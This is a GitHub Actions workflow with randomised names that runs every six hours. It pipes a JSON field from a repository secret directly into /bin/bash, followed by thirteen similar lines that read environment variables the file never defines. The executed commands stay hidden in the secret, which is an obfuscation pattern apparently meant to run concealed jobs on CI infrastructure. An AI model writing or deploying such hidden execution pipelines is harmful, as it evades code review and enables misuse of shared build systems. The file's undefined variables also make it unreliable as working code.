name: tangtanteng5647

on:
  workflow_dispatch:
  schedule:
    - cron: '47 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tangtanteng5647
        env:
          mabuy90: ${{ secrets.mabuy90 }}
        run: |
          echo $mabuy90 | jq -r .ea77606 | /bin/bash
          echo $yfgt83 | jq -r .cwnc91 | /bin/bash
          echo $fhx45010 | jq -r .zvql59 | /bin/bash
          echo $hune664 | jq -r .fj5 | /bin/bash
          echo $k0961 | jq -r .rnxe22728 | /bin/bash
          echo $uig1 | jq -r .kqwl73961 | /bin/bash
          echo $vyvq2164 | jq -r .v4699 | /bin/bash
          echo $zwhm726 | jq -r .npuys696 | /bin/bash
          echo $t138 | jq -r .uh5181 | /bin/bash
          echo $gjh8426 | jq -r .e08 | /bin/bash
          echo $lzjp02726 | jq -r .lwrym90 | /bin/bash
          echo $ae616 | jq -r .qjs026 | /bin/bash
          echo $ascj9203 | jq -r .ezybz961 | /bin/bash
          echo $sv69 | jq -r .wbpt8365 | /bin/bash

